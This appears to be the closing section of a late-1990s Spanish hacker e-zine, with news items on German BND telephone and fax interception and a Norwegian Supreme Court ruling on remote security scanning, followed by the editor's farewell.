llamadas diarias Los servicios de escucha del espionaje aleman BND) intervienen una media diaria de 700 llamadas telefonicas y acceden via satelite a los mensajes telex y fax enviados por otros tantos ciudadanos elegidos mas o menos al azar. Agencias - Segun el semanario "Der Spiegel", la oreja electronica de los servicios secretos ha captado, al amparo de la legalidad que le proporciona la Ley de Escuchas de 1994, alrededor de 13.419 telex y faxes entre julio de 1997 y abril de 1998. El objetivo de esa practica, a la que se someten sin saberlo particulares y empresas, nacionales y extranjeros, diplomaticos y turistas, se resume en palabras como plutonio, terrorismo, armas, narcotrafico o blanqueo de dinero. "Si nos quitaran esa posibilidad nos quedariamos parcialmente ciegos" arguyo el nuevo presidente del BND, August Hannig, el hombre elegido por el canciller federal, Gerhard Schroeder, para hacer de los servicios secretos un cuerpo "mas transparente y eficaz ante los desafios que surgidos con la descomposicion de los bloques". La posibilidad referida por Hannig esta desde el pasado dia 18 en manos del Tribunal Constitucional, instancia con sede en la ciudad de Karslruhe a la que han acudido un catedratico de Derecho Penal de Hamburgo y dos periodistas que ven en las practicas del BND una violacion de los derechos que les garantiza la Constitucion. Los magistrados de Karlsruhe se pronunciaran a principios de a±o acerca de la constitucionalidad de las practicas del espionaje aleman, que con un total de 60.000 agentes, ocupan el cuarto lugar en importancia del mundo, tras EEUU, Gran Breta±a e Israel. Se calcula que de ese total de colaboradores, unos 1.450 se dedican de forma exclusiva a la exploracion electronica, practica para la que el BND cuenta en suelo federal con diez estaciones, mientras que para los puestos en el exterior maneja un presupuesto de 70 millones de marcos (unos 42 millones de dolares). De las diez bases en suelo aleman, el BND comparte con los servicios secretos de EEUU la ubicada en Bad Aibling (sur del pais). Este no es sin embargo el unico ejemplo de la colaboracion que existe entre ambos servicios, pues la joya del espionaje electronico germano y gracias a la cual ha logrado obtener los codigos secretos utilizados en sus mensajes por una docena de embajadas extranjeras en Bonn es el ordenador estadounidense "Cary Supercomputer". Segun la ley de 1994 que revisa el Tribunal Constitucional, el BND esta obligado a informar de sus actividades de escucha al denominado G-10 -comision parlamentaria de composicion secreta-, y a la autoridad correspondiente en caso de la presuncion de delitos. Durante la vista de diciembre en Karlsruhe quedo sin embargo de manifiesto que ni se informa con transparencia al G-10 ni tampoco a la Fiscalia, criticas que fueron contestadas por el BND con el argumento, ya tradicional, de que en esas escuchas no sedetecto nada de relevancia. Las cifras hablan en favor de los servicios de escucha, pues de los 13.419 faxes captados entre julio de 1997 y abril de este a±o, solo cuatro se trasladaron a la autoridades policiales correspondientes, es decir el 0,03 por ciento. En ese mismo periodo, el BND estudio asimismo un total de 2.494 telex que posiblemente podrian contener informacion terrorista, pero en ninguno de ellos encontraron los expertos informacion relevante. "Nunca hay nada", titularon algunos medios de comunicacion, que cargaron sus plumas de ironia para pedir de cara al siglo XXI unos servicios secretos "mas transparentes" y sobre todo "mas eficaces". Una de las pocas victorias conocidas del BND se remonta a la pasada decada, cuando en el marco de sus actividades de escucha descubrieron a tiempo para evitarlo que empresarios alemanes no demasiado escrupulosos colaboraban con el proyecto de una planta de gases venenosos en Rabita, Libia. La informacion salio a la luz publica y el diario "New York Times" la recogio con el titulo: "Auschwitz en el desierto". Al tomar posesion de su cargo como presidente del BND el pasado dia 17, Hanning, dijo que el campo de actuacion de los servicios secretos de un Estado democratico esta perfectamente delimitado y adelanto que sera en ese espacio donde se realizaran los cambios estrategicos necesarios para adecuar el servicio a los desafios que abre el siglo XXI. La primera indicacion de cambio se producira en Berlin, donde el BND preve reforzar su presencia con motivo del traslado del Gobierno federal a esa ciudad el proximo a±o. Hanning, a peticion del nuevo Ejecutivo socialdemocrata-verde, destacara en Berlin 200 agentes, 174 mas de los que el BND ha mantenido todo este tiempo en Bonn. *********************************************************************************************** NORUEGA LEGALIZA EL HACKING El Tribunal Supremo de Noruega ha decido que explorar de forma remota ordenadores conectados a Internet no es un crimen. Esta decisi≤n sienta el precedente de que cualquier sistema conectado a Internet (al menos los que se encuentren en Noreuega) pueden ser examinados legalmente buscando fallos en la seguridad. La decisi≤n se deriva de un caso presentado por la Universidad de Oslo frente a una compa±φa de seguridad privada, Norman Data Defence Systems (NDDS). NDDS habφa sido contratada por un servicio de noticias noruego para hallar agujeros de seguridad en sistemas conectados a Internet para un programa de televisi≤n. La compa±φa us≤ un n·mero estßndar de tΘcnicas para comprobar la seguridad del sistema de correo electr≤nico de la universidad y determinar quien estaba conectado a los ordenadores de la instituci≤n. NDDS afirma que los tests se realizaron simplemente para ver quΘ informaci≤n puede obtenerse utilizando protocolos estßndar de Internet. No se accedi≤ a ning·n dato personal. Sin embargo, la Universidad decidi≤ llevar a los tribunales a la NDDS y al ingeniero concreto que llev≤ a cabo los tests. Tanto la compa±φa como el ingeniero fueron declarados culpables de intento de entrada ilegal y de abuso de recursos informßticos a los que no tenφan derecho de acceso. Se puso una multa a la NDDS y se les orden≤ pagar por la reparaci≤n de la red de la Universidad. Una primera apelaci≤n consigui≤ retirar la acusaci≤n de entrada ilegal y ahora, en una segunda apelaci≤n, el Tribunal Supremo de Noruega ha retirado tambiΘn el cargo de abuso de recursos informßticos. "La esencia de la decisi≤n es que si quieres unirte a Internet, has de asegurarte de que estßs protegido", dijo el representante de la NDDS Gunnel Wullstein. "Si no quieres que te visiten, cierra tus ports". *********************************************************************************************** ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ********************* ╨35P3╨1╨A y C13Rr3 * ********************* Bueno pues este numero tengo que reconocer que ha sido algo mas corto que los anteriores, pero nadie me podra negar que los contenidos merecen la pena. Espero que os aya gustado y que colaboreis con los proximos numeros. Tambien espero que ayais pasado unas felices fiestas de navidad que los reyes "majos" o "el padre de noel" os ayan traido muchas cosas y todo eso que se dice por estas fechas, feliz navidad y prospero nuevo hackeo. ByEz------->ZeD zed@mixmail.com http://www.angelfire,com/ak/HACKZED/ZED2.html